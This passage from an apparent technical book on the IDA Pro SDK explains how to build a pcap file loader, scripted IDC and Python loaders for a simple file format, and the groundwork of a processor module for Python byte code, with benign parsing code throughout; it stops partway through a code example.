demonstrate several more capabilities of IDA’s SDK. No attempt is made here to

match the capabilities of tools such as Wireshark (see

http://www.wireshark.org/) in any way.

The development process for such a loader requires some research into

the pcap file format, which reveals that a pcap file is structured with the

following rough syntax:

pcap_file: pcap_file_header (pcap_packet)*

pcap_packet: pcap_packet_header pcap_content

pcap_content: (byte)+

A pcap_file_header contains a 32-bit magic number field, as well as other

fields describing the content of the file, including the type of packets

contained in the file. For the sake of simplification, we assume here that we are

dealing only with DLT_EN10MB (10Mb Ethernet packets). In developing the

pcap loader, one of our goals is to identify as much header data as possible

in order to help users focus on packet content, particularly at the application

layer. Our approach for accomplishing this goal is (1) to separate the file

header from the packet data by creating a separate segment for each and

(2) to identify as many header structures as possible with the packets

segment so that the user does not need to manually parse the file content.

The discussion that follows focuses only on the load_file component of the

pcap loader, because the accept_file function is a simple adaptation of the

accept_simpleton_file function changed to recognize the pcap magic number.

In order to highlight header structures, we will need to have some com-

monly used structures defined in the IDA Structures window during the load-

ing phase. This allows the loader to automatically format groups of bytes as

structures when the datatype for those bytes is known. Pcap header struc-

tures and various networking-related structures describing Ethernet, IP,

TCP, and UDP headers are defined in IDA’s GNU C++ Unix type library;

however, in versions of IDA prior to 5.3, the definition for the IP header struct

(iphdr) is incorrect. The first step that load_pcap_file takes is to call a helper

function we have written named add_types to take care of importing struc-

tures into the new database. We examine two possible versions of add_types,

one that makes use of the types declared in IDA’s GNU C++ Unix type library

and another version in which add_types takes care of all required structure

declarations by itself.

The first version loads the GNU C++ Unix type library and then pulls

type identifiers from the newly loaded type library. This version of add_types

is shown here:

void add_types() {

#ifdef ADDTIL_DEFAULT

add_til2("gnuunx.til", ADDTIL_SILENT);

#else

add_til("gnuunx.til");

#endif

pcap_hdr_struct = til2idb(-1, "pcap_file_header");

pkthdr_struct = til2idb(-1, "pcap_pkthdr");

ether_struct = til2idb(-1, "ether_header");

ip_struct = til2idb(-1, "iphdr");

tcp_struct = til2idb(-1, "tcphdr");

udp_struct = til2idb(-1, "udphdr");

}

The add_til functions defined in typinf.hpp are used to load an existing

type library file into a database. The add_til function was deprecated in favor

of add_til2 with the introduction of IDA version 5.1. These functions are

the SDK equivalent of loading a .til file using the Types window discussed in

Chapter 8. Once a type library has been loaded, the til2idb function may be

utilized to import individual types into the current database. This is the pro-

grammatic equivalent of adding a standard structure to the Structures win-

dow, which was also described in Chapter 8. The til2idb function returns a

type identifier that is required whenever we want to convert a range of bytes

into a specific structured datatype. We have chosen to save these type identi-

fiers into global variables (each of type tid_t) in order to provide faster access

to types later in the loading process.

Two drawbacks to this first version of add_types are the fact that we need

to import an entire type library just to gain access to six datatypes and, as

mentioned previously, the built-in IDA definition of a structure may be incor-

rect, which would lead to problems when we attempt to apply these struc-

tures later in the loading process.

The second version of add_types demonstrates the process of building a

type library on the fly by parsing actual C-style structure declarations. This

version is shown here:

void add_types() {

til_t *t = new_til("pcap.til", "pcap header types"); //empty type library

parse_decls(t, pcap_types, NULL, HTI_PAK1); //parse C declarations into library

sort_til(t); //required after til is modified

pcap_hdr_struct = import_type(t, -1, "pcap_file_header");

pkthdr_struct = import_type(t, -1, "pcap_pkthdr");

ether_struct = import_type(t, -1, "ether_header");

ip_struct = import_type(t, -1, "iphdr");

tcp_struct = import_type(t, -1, "tcphdr");

udp_struct = import_type(t, -1, "udphdr");

free_til(t); //free the temporary library

}

In this case, a temporary, empty type library is created using the new_til

function. The new type library is populated by parsing a string (pcap_types)

that contains valid C structure definitions for the types required by the

loader. The first few lines of the pcap_types string are shown here:

char *pcap_types =

"struct pcap_file_header {\n"

"int magic;\n"

"short version_major;\n"

"short version_minor;\n"

"int thiszone;\n"

"int sigfigs;\n"

"int snaplen;\n"

"int linktype;\n"

"};\n"

...

The declaration of pcap_types continues and includes structure defini-

tions for all of the structures required by the pcap loader. In order to simplify

the parsing process, we elected to change all data declarations used within the

structure definitions to make use of standard C datatypes.

The HTI_PAK1 constant is defined in typinf.hpp and is one of many HTI_XXX

values that may be used to control the behavior of the internal C parser. In

this case, structure packing on a 1-byte boundary is being requested. Follow-

ing modification, a type library is expected to be sorted using sort_til, at

which point it is ready to use. The import_type function pulls the requested

structure type from the specified type library into the database in a manner

similar to til2idb. In this version, again we save the returned type identifier

into global variables for use later in the loading process. The function com-

pletes by deleting the temporary type library using the free_til function to

release the memory consumed by the type library. In this version of add_types,

unlike the first version, we have complete control over the datatypes that we

choose to import into the database, and we have no need to import entire

libraries of structures that we have no intention of using.
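To see why 1-byte packing matters when a structure is overlaid on raw file bytes, it helps to compare a packed layout with a naturally aligned one. The sketch below uses Python's struct module rather than IDA's parser, and the two-field record is a made-up example, not one of the loader's types.

```python
import struct

# Hypothetical record: struct { char tag; int value; }
packed_size = struct.calcsize("=bi")   # standard sizes, no alignment padding
native_size = struct.calcsize("@bi")   # this machine's C alignment rules

def value_offset(size):
    """Offset of 'value': the int occupies the last 4 bytes in both layouts."""
    return size - 4
```

On typical platforms the native layout inserts padding before value, so a template built that way would drift out of step with bytes taken straight from a file or from the wire.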

As an aside, it is also possible to save the temporary type library file to

disk using the store_til function (which should be preceded by a call to

compact_til). With so few types to construct, this has little benefit in this case,

because it is just as easy to build the structures each time the loader is exe-

cuted as it is to build and distribute a special-purpose type library that must

be properly installed and in the end does not save a significant amount

of time.

Turning our attention to the load_pcap_file function, we see the call to

add_types to initialize the datatypes, as discussed previously; the creation of a

file comment; followed by loading the pcap file header into the database,

creating a section around the header bytes, and transforming the header

bytes into a pcap_file_header structure:

void idaapi load_pcap_file(linput_t *li, ushort, const char *) {

ssize_t len;

pcap_pkthdr pkt;

add_types(); //add structure templates to database

create_filename_cmt(); //create the main file header comment

//load the pcap file header from the file into the database

file2base(li, 0, 0, sizeof(pcap_file_header), FILEREG_PATCHABLE);

//try to add a new data segment to contain the file header bytes

if (!add_segm(0, 0, sizeof(pcap_file_header), ".file_header", CLASS_DATA)) {

loader_failure();

}

//convert the file header bytes into a pcap_file_header

doStruct(0, sizeof(pcap_file_header), pcap_hdr_struct);

//... continues

Once again, we see the use of file2base to load content from the newly

opened disk file into the database. Once the pcap file header content has

been loaded, it gets its own section in the database, and the pcap_file_header

structure is applied to all of the header bytes using the doStruct function,

declared in bytes.hpp, which is the SDK equivalent of using Edit ▸ Struct Var

to convert a contiguous block of bytes into a structure. The doStruct function

expects an address, a size, and a type identifier, and it converts size bytes at

the given address into the given type.
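Conceptually, applying a structure template means interpreting a run of bytes at an address according to a field list. The following standalone Python sketch mimics that idea outside IDA. The names apply_template and PCAP_FILE_HEADER are hypothetical, and a little-endian capture is assumed.

```python
import struct

# (name, struct format code) pairs mirroring pcap_file_header
PCAP_FILE_HEADER = [
    ("magic", "I"), ("version_major", "H"), ("version_minor", "H"),
    ("thiszone", "i"), ("sigfigs", "I"), ("snaplen", "I"), ("linktype", "I"),
]

def apply_template(buf, ea, template):
    """Decode the bytes at offset ea as the given template.

    Returns (fields, size): a dict of field values and the byte count covered.
    """
    fmt = "<" + "".join(code for _, code in template)
    values = struct.unpack_from(fmt, buf, ea)
    fields = dict(zip((name for name, _ in template), values))
    return fields, struct.calcsize(fmt)
```

The returned size plays the role of the size argument to doStruct: it tells the caller where the next template could begin.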

The load_pcap_file function continues by reading all of the packet con-

tent and creating a single .packets section around the packet content, as

shown here:

//...continuation of load_pcap_file

uint32 pos = sizeof(pcap_file_header); //file position tracker

while ((len = qlread(li, &pkt, sizeof(pkt))) == sizeof(pkt)) {

mem2base(&pkt, pos, pos + sizeof(pkt), pos); //transfer header to database

pos += sizeof(pkt); //update position pointer point to packet content

//now read packet content based on number of bytes of packet that are

//present

file2base(li, pos, pos, pos + pkt.caplen, FILEREG_PATCHABLE);

pos += pkt.caplen; //update position pointer to point to next header

}

//create a new section around the packet content. This section begins where

//the pcap file header ended.

if (!add_segm(0, sizeof(pcap_file_header), pos, ".packets", CLASS_DATA)) {

loader_failure();

}

//retrieve a handle to the new segment

segment_t *s = getseg(sizeof(pcap_file_header));

//so that we can set 32 bit addressing mode on

set_segm_addressing(s, 1); //set 32 bit addressing

//...continues

In the preceding code, the mem2base function is new; it transfers content

that has already been loaded into memory into the database.

The load_pcap_file function concludes by applying structure templates

wherever possible throughout the database. We must apply structure tem-

plates after creating the segment; otherwise the act of creating the segment

will remove all applied structure templates, negating all of our hard work.

The third and final portion of the function is shown here:

//...continuation of load_pcap_file
   //apply header structs for each packet in the database
   for (uint32 ea = s->startEA; ea < pos;) {
      uint32 pcap = ea; //start of packet
      //apply pcap packet header struct
      doStruct(pcap, sizeof(pcap_pkthdr), pkthdr_struct);
      uint32 eth = pcap + sizeof(pcap_pkthdr);
      //apply Ethernet header struct
      doStruct(eth, sizeof(ether_header), ether_struct);
      //Test Ethernet type field
      uint16 etype = get_word(eth + 12);
      etype = (etype >> 8) | (etype << 8); //swap bytes (ntohs)
      if (etype == ETHER_TYPE_IP) {
         uint32 ip = eth + sizeof(ether_header);
         //Apply IP header struct
         doStruct(ip, sizeof(iphdr), ip_struct);
         //Test IP protocol
         uint8 proto = get_byte(ip + 9);
         //compute IP header length
         uint32 iphl = (get_byte(ip) & 0xF) * 4;
         if (proto == IP_PROTO_TCP) {
            doStruct(ip + iphl, sizeof(tcphdr), tcp_struct);
         }
         else if (proto == IP_PROTO_UDP) {
            doStruct(ip + iphl, sizeof(udphdr), udp_struct);
         }
      }
      //point to start of next pcap_pkthdr (offset 8 holds caplen)
      ea += get_long(pcap + 8) + sizeof(pcap_pkthdr);
   }
}

The preceding code simply steps through the database, one packet at a

time, and examines a few fields within each packet header in order to deter-

mine both the type of structure to be applied and the location of the start of

that structure. The following output represents the first few lines of a pcap

file that has been loaded into a database using the pcap loader:

.file_header:0000 _file_header segment byte public 'DATA' use16

.file_header:0000 assume cs:_file_header

.file_header:0000 pcap_file_header <0A1B2C3D4h, 2, 4, 0, 0, 0FFFFh, 1>

.file_header:0000 _file_header ends

.file_header:0000

.packets:00000018 ; =========================================================

.packets:00000018

.packets:00000018 ; Segment type: Pure data

.packets:00000018 _packets segment byte public 'DATA' use32

.packets:00000018 assume cs:_packets

.packets:00000018 ;org 18h

.packets:00000018 pcap_pkthdr <<47DF275Fh, 1218Ah>, 19Ch, 19Ch>

.packets:00000028 db 0, 18h, 0E7h, 1, 32h, 0F5h; ether_dhost

.packets:00000028 db 0, 50h, 0BAh, 0B8h, 8Bh, 0BDh; ether_shost

.packets:00000028 dw 8 ; ether_type

.packets:00000036 iphdr <45h, 0, 8E01h, 0EE4h, 40h, 80h, 6, 9E93h,

200A8C0h, 6A00A8C0h>

.packets:0000004A tcphdr <901Fh, 2505h, 0C201E522h, 6CE04CCBh, 50h,

18h, 0E01Ah, 3D83h, 0>

.packets:0000005E db 48h ; H

.packets:0000005F db 54h ; T

.packets:00000060 db 54h ; T

.packets:00000061 db 50h ; P

.packets:00000062 db 2Fh ; /

.packets:00000063 db 31h ; 1

.packets:00000064 db 2Eh ; .

.packets:00000065 db 30h ; 0

Applying structure templates in this manner, we can expand and col-

lapse any header to show or hide its individual member fields. As displayed,

it is fairly easy to observe that the byte at address 0000005E is the first byte of

an HTTP response packet.
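The addresses in the listing can be checked by hand: the Ethernet header starts at 0x28, the IP header 14 bytes later at 0x36, the TCP header at 0x4A, and the payload at 0x5E. The Python sketch below computes the same relative offsets for a single frame. It goes one step beyond the loader by also reading the TCP data-offset field to locate the payload. The constant values are the standard ones for IPv4 over Ethernet, and the function name is ours.

```python
ETHER_TYPE_IP = 0x0800
IP_PROTO_TCP = 6
IP_PROTO_UDP = 17

def layer_offsets(frame):
    """Map header names to byte offsets within one Ethernet frame."""
    offsets = {"ether": 0}
    etype = int.from_bytes(frame[12:14], "big")   # network byte order
    if etype != ETHER_TYPE_IP:
        return offsets
    ip = 14                                       # sizeof(ether_header)
    offsets["ip"] = ip
    iphl = (frame[ip] & 0x0F) * 4                 # IP header length in bytes
    proto = frame[ip + 9]
    l4 = ip + iphl
    if proto == IP_PROTO_TCP:
        offsets["tcp"] = l4
        # TCP data offset: high nibble of byte 12, counted in 32-bit words
        offsets["payload"] = l4 + (frame[l4 + 12] >> 4) * 4
    elif proto == IP_PROTO_UDP:
        offsets["udp"] = l4
        offsets["payload"] = l4 + 8               # fixed-size UDP header
    return offsets
```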

Having a basic loading capability for pcap files lays the groundwork for

developing plug-ins that perform more sophisticated tasks, such as TCP

stream reassembly and various other forms of data extraction. Additional

work could go into formatting various networking-related structures in a

more user-friendly manner, such as displaying readable versions of an IP

address and host byte-ordered displays for other fields within each

header. Such improvements are left as challenges to the reader.
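As a starting point for that exercise, the conversions themselves are small. The sketch below is standalone Python rather than SDK code. It takes values exactly as they appear in the listing above (little-endian reads of network-order fields) and renders them readably; the helper names are hypothetical.

```python
import socket
import struct

def ip_from_le_dword(value):
    """Render an IPv4 address from the little-endian dword IDA displays."""
    return socket.inet_ntoa(struct.pack("<I", value))

def host_order16(value):
    """Byte-swap a 16-bit network-order field that was read little-endian."""
    return ((value >> 8) | (value << 8)) & 0xFFFF
```

Applied to the listing, the two iphdr addresses 200A8C0h and 6A00A8C0h become 192.168.0.2 and 192.168.0.106, and the first tcphdr field, 901Fh, becomes port 8080.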

Alternative Loader Strategies

If you spend some time browsing the example loaders included with the

SDK, you will find several different styles of loaders. One loader worth point-

ing out is the Java loader (<SDKDIR>/ldr/javaldr). For some file formats, the

coupling between the loader and the processor module is very loose. Once

the loader makes note of entry points into the code, the processor module

needs no additional information in order to properly disassemble the code.

Some processor modules may require substantially more information about

the original input file and may be required to perform much of the same

parsing that was previously completed by the loader. In order to avoid such

duplication of effort, a loader and a processor may be paired in a much more

tightly coupled manner. In fact, the approach taken in the Java loader is

essentially to push all loading tasks (those that would usually take place in

the loader’s load_file function) into the processor module using code similar

to the following:

static void load_file(linput_t *li, ushort neflag, const char *) {

if (ph.id != PLFM_JAVA) {

set_processor_type("java", SETPROC_ALL | SETPROC_FATAL);

}

if (ph.notify(ph.loader, li, (bool)(neflag & NEF_LOPT))) {

error("Internal error in loader<->module link");

}

}

In the Java loader, the only work that takes place is to verify that the

processor type is set to the Java processor, at which point the loader sends

a ph.loader (defined in idp.hpp) notification message to the processor module

to inform the processor that the loading phase has been initiated. Upon

receipt of the notification, the Java processor takes over the responsibility for

loading, and in the process it derives a significant amount of internal state

information that will be reused when the processor is directed to perform its

disassembly tasks.

Whether this strategy makes sense for you depends entirely on whether you are

developing both a loader and an associated processor module and whether you

feel that the processor would benefit from access to the information tradition-

ally derived within the loader (segmentation, file header fields, debugging

information, and so on).

Another means to pass state information from the loader to the proces-

sor module involves the use of database netnodes. During the loading phase,

the loader may choose to populate specific netnodes with information that

can later be retrieved by the processor module during the disassembly phase.

Note that frequently accessing the database to retrieve information stored in

this manner may be somewhat slower than utilizing available C++ datatypes.

Writing a Scripted Loader

In IDA 5.6 Hex-Rays introduced the capability to implement loaders using

Python or IDC scripts. In the Hex Blog posting announcing this new capability,⁷

Elias Bachaalany of Hex-Rays describes a loader, implemented in Python,

used to load a particular type of malicious .pdf file containing shellcode. The

nature of malicious .pdf files is such that the loader does not generalize across

all .pdf files, but the loader is an excellent example of how to load unsupported

file formats in IDA.

Scripted loaders may be implemented in either IDC or Python and

require at least two functions, accept_file and load_file, which perform

functions similar to those previously described for SDK-based loaders. An

IDC-based loader for the Simpleton file format is shown here:

#include <idc.idc>

#define SIMPLETON_MAGIC 0x1DAB00C

//Verify the input file format
//   li - loader_input_t object. See IDA help file for more information
//   n  - How many times we have been called
//Returns:
//   0 - file unrecognized
//   Name of file type - if file is recognized
static accept_file(li, n) {
   auto magic;
   if (n) return 0;
   li.readbytes(&magic, 4, 0);
   if (magic != SIMPLETON_MAGIC) {
      return 0;
   }
   return "IDC Simpleton Loader";
}

//Load the file
//   li - loader_input_t object
//   neflags - refer to loader.hpp for valid flags
//   format - The file format selected by the user
//Returns:
//   1 - success
//   0 - failure
static load_file(li, neflags, format) {
   auto magic, size, base;
   li.seek(0, 0);
   li.readbytes(&magic, 4, 0);
   li.readbytes(&size, 4, 0);
   li.readbytes(&base, 4, 0);
   // copy bytes to the database
   loadfile(li, 12, base, size);
   // create a segment
   AddSeg(base, base + size, 0, 1, saRelPara, scPub);
   // add the initial entry point
   AddEntryPoint(base, base, "_start", 1);
   return 1;
}

7. See http://www.hexblog.com/?p=110.

Other than the use of IDC functions in place of SDK functions, the simi-

larities between the IDC version of the simpleton loader and the C++ version

presented earlier should be fairly obvious. Loader scripts are installed by

copying them to <IDADIR>/loaders.

Python may also be used to develop loaders and allows for more robust

development because it offers much greater access to IDA’s underlying SDK.

Implemented in Python, the simpleton loader might look something like this.

import struct
# add_segm and add_entry are assumed here to be imported from idaapi
from idaapi import add_segm, add_entry

#Verify the input file format
#   li - loader_input_t object. See IDA help file for more information
#   n  - How many times we have been called
#Returns:
#   0 - file unrecognized
#   Name of file type - if file is recognized
def accept_file(li, n):
   if (n):
      return 0
   li.seek(0)
   magic = struct.unpack("<I", li.read(4))[0]
   if magic != 0x1DAB00C:
      return 0
   return "Python Simpleton Loader"

#Load the file
#   li - loader_input_t object
#   neflags - refer to loader.hpp for valid flags
#   format - The file format selected by the user
#Returns:
#   1 - success
#   0 - failure
def load_file(li, neflags, format):
   li.seek(0)
   (magic, size, base) = struct.unpack("<III", li.read(12))
   # copy bytes to the database
   li.file2base(12, base, base + size, 1)
   # create a segment
   add_segm(0, base, base + size, ".text", "CODE")
   # add the initial entry point
   add_entry(base, base, "_start", 1)
   return 1

One of the greatest strengths of scripting loaders (and plug-ins for that

matter) is that they allow for rapid prototyping of modules that might even-

tually be implemented using the SDK.
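Rapid prototyping also benefits from throwaway test inputs. The following sketch runs under plain Python, outside IDA, and produces the header layout that both scripted loaders read: a 32-bit magic number, a size, and a base address, followed by size bytes of content. Little-endian order is assumed, matching the "<III" format used in the Python loader. The names build_simpleton and parse_simpleton are illustrative only.

```python
import struct

SIMPLETON_MAGIC = 0x1DAB00C

def build_simpleton(code, base):
    """Prefix raw bytes with the 12-byte header the loaders above read."""
    return struct.pack("<III", SIMPLETON_MAGIC, len(code), base) + code

def parse_simpleton(image):
    """Return (base, code), or None if the magic number does not match."""
    magic, size, base = struct.unpack_from("<III", image, 0)
    if magic != SIMPLETON_MAGIC:
        return None
    return base, image[12:12 + size]
```

Writing the result of build_simpleton to disk gives a file that either loader's accept_file should recognize.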

Summary

Once you have developed an understanding of how loaders fit into IDA’s

modular architecture, you should find that loader modules are no more diffi-

cult to create than plug-in modules. Loaders clearly have their own particular

subset of the SDK that they rely heavily on, the majority of which resides in

loader.hpp, segment.hpp, entry.hpp, and diskio.hpp. Finally, since loaders execute

before the processor module has a chance to analyze the newly loaded code,

loaders should never bother themselves with any disassembly tasks, such as

dealing with functions or disassembled instructions.

In the next chapter, we round out our discussion of IDA modules with

an introduction to processor modules, the components most responsible for

the overall formatting of a disassembled binary.

IDA PROCESSOR MODULES

The last type of IDA module that can be

built with the SDK is the processor module,

which is by far the most complex of IDA’s

module types. Processor modules are responsible

for all of the disassembly operations that take place

within IDA. Beyond the obvious conversion of machine

language opcodes into their assembly language equivalents, processor mod-

ules are also responsible for tasks such as creating functions, generating

cross-references, and tracking the behavior of the stack pointer. As it has

done with plug-ins and loaders, Hex-Rays has made it possible (beginning

with IDA 5.7) to author processor modules using one of IDA’s scripting

languages.

The obvious case that would require development of a processor module

is reverse engineering a binary for which no processor module exists. Among

other things, such a binary might represent firmware images for embedded

microcontrollers or executable images pulled from handheld devices. A less-

obvious use for a processor module might be to disassemble the instructions

of a custom virtual machine embedded within an obfuscated executable. In

such cases, an existing IDA processor module such as the pc module for x86

would help you understand only the virtual machine itself; it would offer no

help at all in disassembling the virtual machine’s underlying byte code. Rolf

Rolles demonstrated just such an application of a processor module in a paper

posted to OpenRCE.org.¹ In Appendix B of his paper, Rolf also shares his

thoughts on creating IDA processor modules; this is one of the few docu-

ments available on the subject.

In the world of IDA modules, there are an infinite number of conceiv-

able uses for plug-ins, and after scripts, plug-ins are by far the most commonly

available third-party add-ons for IDA. The need for custom loader modules

is far smaller than the need for plug-ins. This is not unexpected, as the num-

ber of binary file formats (and hence the need for loaders) tends to be much

smaller than the number of conceivable uses for plug-ins. A natural conse-

quence is that outside of modules donated to and distributed with IDA, there

tend to be relatively few third-party loader modules published. Smaller still is

the need for processor modules, as the number of instruction sets requiring

decoding is smaller than the number of file formats that make use of those

instruction sets. Here again, this leads to an almost complete lack of third-

party processor modules other than the few distributed with IDA and its

SDK. Judging by the subjects of posts to the Hex-Rays forums, it is clear that

people are working on processor modules; these modules are simply not

being released to the public.

In this chapter, we hope to shed additional light on the topic of creating

IDA processor modules and help to demystify (at least somewhat) the last of

IDA’s modular components. As a running example, we will develop a proces-

sor module to disassemble Python byte code. Since the components of a pro-

cessor module can be lengthy, it will not be possible to include complete

listings of every piece of the module. The complete source code for the Python

processor module is available on the book’s companion website. It is impor-

tant to understand that without the benefit of a Python loader module, it will

not be possible to perform fully automated disassembly of compiled .pyc files.

Lacking such a loader, you will need to load .pyc files in binary mode, select

the Python processor module, identify a likely starting point for a function,

and then convert the displayed bytes to Python instructions using Edit ▸ Code.

Python Byte Code

Python² is an object-oriented, interpreted programming language. Python

is often used for scripting tasks in a manner similar to Perl. Python source

files are commonly saved with a .py extension. Whenever a Python script is

executed, the Python interpreter compiles the source code to an internal

representation known as Python byte code.³ This byte code is ultimately

interpreted by a virtual machine. This entire process is somewhat analogous

to the manner in which Java source is compiled to Java byte code, which is

ultimately executed by a Java virtual machine. The primary difference is that

Java users must explicitly compile their Java source into Java byte code, while

Python source code is implicitly converted to byte code every time a user

elects to execute a Python script.

1. See “Defeating HyperUnpackMe2 With an IDA Processor Module” at http://www.openrce.org/articles/full_view/28.

2. See http://www.python.org/.

3. See http://docs.python.org/library/dis.html#bytecodes for a complete list of Python byte code instructions and their meanings. Also see opcode.h in the Python source distribution for a mapping of byte code mnemonics to their equivalent opcodes.

In order to avoid repeated translations from Python source to Python

byte code, the Python interpreter may save the byte code representation of

a Python source file in a .pyc file that may be loaded directly on subsequent

execution, eliminating the time spent in translating the Python source. Users

typically do not explicitly create .pyc files. Instead, the Python interpreter

automatically creates .pyc files for any Python source module that is imported

by another Python source module. The theory is that modules tend to get

reused frequently, and you can save time if the byte code form of the module

is readily available. Python byte code (.pyc) files are the rough equivalent of

Java .class files.
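A .pyc file can also be produced on demand, which is handy when test inputs are needed. The sketch below is written for a current Python 3 interpreter, whereas this chapter targets Python 2.x byte code, so the header layout and instruction encoding it produces differ from what the example processor module expects. It only illustrates that a compiled file exists and begins with a version-specific magic number. The function name compile_to_pyc is ours.

```python
import importlib.util
import os
import py_compile
import tempfile

def compile_to_pyc(source_text):
    """Compile source text to a .pyc file and return the file's raw bytes."""
    with tempfile.TemporaryDirectory() as tmp:
        src = os.path.join(tmp, "demo.py")
        pyc = os.path.join(tmp, "demo.pyc")
        with open(src, "w") as f:
            f.write(source_text)
        py_compile.compile(src, cfile=pyc, doraise=True)
        with open(pyc, "rb") as f:
            return f.read()

pyc_bytes = compile_to_pyc("x = 1 + 2\n")
# The file begins with the running interpreter's magic number
has_magic = pyc_bytes[:4] == importlib.util.MAGIC_NUMBER
```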

Given that the Python interpreter does not require source code when

a corresponding byte code file is available, it may be possible to distribute

some portions of a Python project as byte code rather than as source. In such

cases, it might be useful to reverse engineer the byte code files in order to

understand what they do, just as we might do with any other binary software

distribution. This is the intended purpose of our example Python processor

module—to provide a tool that can assist in reverse engineering Python

byte code.

The Python Interpreter

A little background on the Python interpreter may be useful as we develop

the Python processor module. The Python interpreter implements a stack-

based virtual machine that is capable of executing Python byte code. By

stack-based, we mean that the virtual machine has no registers other than an

instruction pointer and a stack pointer. The majority of Python byte code

instructions manipulate the stack in some way by reading, writing, or examin-

ing stack content. The BINARY_ADD byte code instruction, for example, removes

two items from the interpreter’s stack, adds those two items together, and

places the single result value back on the top of the interpreter’s stack.
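The stack discipline described above can be modeled in a few lines. This toy interpreter is only an illustration: it works on (mnemonic, argument) pairs instead of real byte code and supports just two instructions, with LOAD_CONST simplified to carry its value directly.

```python
def run(program):
    """Execute (mnemonic, argument) pairs on a toy operand stack."""
    stack = []
    for op, arg in program:
        if op == "LOAD_CONST":
            stack.append(arg)               # push one value
        elif op == "BINARY_ADD":
            right = stack.pop()             # remove two items...
            left = stack.pop()
            stack.append(left + right)      # ...and push their sum
        else:
            raise ValueError("unsupported instruction: " + op)
    return stack
```

Running two LOAD_CONST instructions followed by BINARY_ADD leaves a single value, the sum, on the stack.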

In terms of instruction set layout, Python byte codes are relatively simple

to understand. All Python instructions consist of a single-byte opcode and

either zero or two operand bytes. The processor example presented in this

chapter does not require that you have any prior knowledge of Python byte

code. In the few instances where specific knowledge is required, we will

take the time to explain the byte code sufficiently. The primary goal of this

chapter is to provide a basic understanding of IDA processor modules and

some of the considerations that go into creating them. Python byte code is

merely used as a means to facilitate this goal.
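The instruction layout described above (a one-byte opcode followed by zero or two operand bytes) leads to a very small decoding loop. The sketch below assumes the Python 2.x convention, taken from CPython's opcode.h, that opcodes numbered 90 and above carry a two-byte little-endian operand. It is a standalone illustration, not code from the processor module.

```python
HAVE_ARGUMENT = 90   # CPython 2.x opcode.h: opcodes >= 90 take an operand

def decode(code):
    """Yield (offset, opcode, operand) for Python 2.x-style byte code."""
    code = bytearray(code)
    pc = 0
    while pc < len(code):
        opcode = code[pc]
        if opcode >= HAVE_ARGUMENT:
            # two operand bytes, stored little-endian
            operand = code[pc + 1] | (code[pc + 2] << 8)
            yield pc, opcode, operand
            pc += 3
        else:
            yield pc, opcode, None
            pc += 1
```

For example, the eight bytes 100, 0, 0, 100, 1, 0, 23, 83 decode as two LOAD_CONST instructions (opcode 100), a BINARY_ADD (23), and a RETURN_VALUE (83).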

Writing a Processor Module Using the SDK

It wouldn’t be proper to begin a discussion of creating a processor module

without including the standard disclaimer that documentation concerning

processor modules is scarce. Other than reading through SDK include files

and the source of processor modules included with the SDK, you will find

that the SDK’s readme.txt file is the only other file that sheds any light on how

to create a processor module, with a few notes under the heading “Descrip-

tion of processor modules.”

It is worth clarifying that while the README file references specific file-

names within a processor module as if those filenames are set in stone, in

fact they are not. They do, however, tend to be the filenames that are used

in the included SDK examples, and they are also the filenames referenced in

the build scripts included with those examples. Feel free to create your pro-

cessor modules using any filenames you like, as long as you update your build

scripts accordingly.

The general intent of referring to specific processor files is to convey the

idea that a processor module consists of three logical components: an analyzer,

an instruction emulator, and an output generator. We will cover the purpose of

each of these functional components as we work our way through the cre-

ation of our Python processor module.

Several example processors can be found in <SDKDIR>/module. One of

the simpler processors to read through (if there is such a thing) is the z8 pro-

cessor. Other processor modules vary in complexity based on their instruc-

tion sets and whether they take on any of the loading responsibilities. If you

are thinking about writing your own processor module, one approach for

getting started (recommended by Ilfak in the README file) is to copy an

existing processor module and modify it to suit your needs. In such cases,

you will want to find the processor module that most closely resembles the

logical structure (not necessarily the processor architecture) that you envi-

sion for your module.

The processor_t Struct

As with plug-ins and loaders, processor modules export exactly one thing.

For processors, that one thing is a processor_t struct that must be named

LPH. This struct is exported automatically if you include <SDKDIR>/module/

idaidp.hpp, which in turn includes many other SDK header files commonly

required by processor modules. One of the reasons why writing a processor

module is so challenging is that the processor_t struct contains 56 fields that

must be initialized, and 26 of those fields are function pointers, while 1 of

the fields is a pointer to an array of one or more struct pointers that each

point to a different type of struct (asm_t) that contains 59 fields requiring

initialization. Easy enough, right? One of the principal inconveniences in

building processor modules revolves around initializing all of the required

static data, a process that can be error prone because of the large number of

fields within each data structure. This is one of the reasons why Ilfak recom-

mends using an existing processor as the basis for any new processors you

develop.

Because of the complexity of these data structures, we will not attempt to

enumerate every possible field and its uses. Instead, we will highlight the major

fields and refer you to idp.hpp for further details on these and other fields

within each structure. The order in which we cover various processor_t fields

bears no resemblance to the order in which those fields are declared within

processor_t.

Basic Initialization of the LPH Structure

Before diving into the behavioral aspects of your processor module, there

are some static data requirements that you should take care of. As you build

a disassembly module, you need to create a list of every assembly language

mnemonic that you intend to recognize for your target processor. This list is

created in the form of an array of instruc_t (defined in idp.hpp) structures

and is commonly placed in a file named ins.cpp. As shown here, instruc_t is

a simple structure whose purpose is twofold. First, it provides a table lookup

for instruction mnemonics. Second, it describes some basic characteristics of

each instruction.

struct instruc_t {

const char *name; //instruction mnemonic

ulong feature; //bitwise OR of CF_xxx flags defined in idp.hpp

};

The feature field is used to indicate behaviors such as whether the instruc-

tion reads or writes any of its operands and how execution continues once

the instruction is executed (default, jump, call). The CF in CF_xxx stands for

canonical feature. The feature field basically drives the concepts of control flow

and cross-references. A few of the more interesting canonical feature flags

are described here:

CF_STOP The instruction does not pass control to the following instruction.

Examples might include absolute jumps or function-return instructions.

CF_CHGn The instruction modifies operand n, where n is in the range 1..6.

CF_USEn The instruction uses operand n, where n is in the range 1..6, and

uses means “reads” or “refers to” (but does not modify; see CF_CHGn) a

memory location.

CF_CALL The instruction calls a function.
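
To make the role of the feature field a little more concrete, the following sketch tests individual bits of a feature word. The DEMO_CF_xxx constants are local stand-ins whose values are assumptions made for illustration (the authoritative definitions are in idp.hpp), and reads_operand and describe_flow are hypothetical helpers, not SDK functions. The sketch also assumes that the USE flags for operands 1 through 6 occupy consecutive bits.

```cpp
#include <cassert>
#include <cstdint>
#include <string>

// Local stand-ins for a few CF_xxx flags. The values are assumptions made
// for this sketch; consult idp.hpp for the real definitions.
const std::uint32_t DEMO_CF_STOP = 0x0001;  // does not pass control onward
const std::uint32_t DEMO_CF_CALL = 0x0002;  // calls a function
const std::uint32_t DEMO_CF_USE1 = 0x0100;  // reads operand 1

// Hypothetical helper: does the instruction read operand n (1..6)?
// Assumes the USE flags occupy consecutive bits starting at DEMO_CF_USE1.
bool reads_operand(std::uint32_t feature, int n) {
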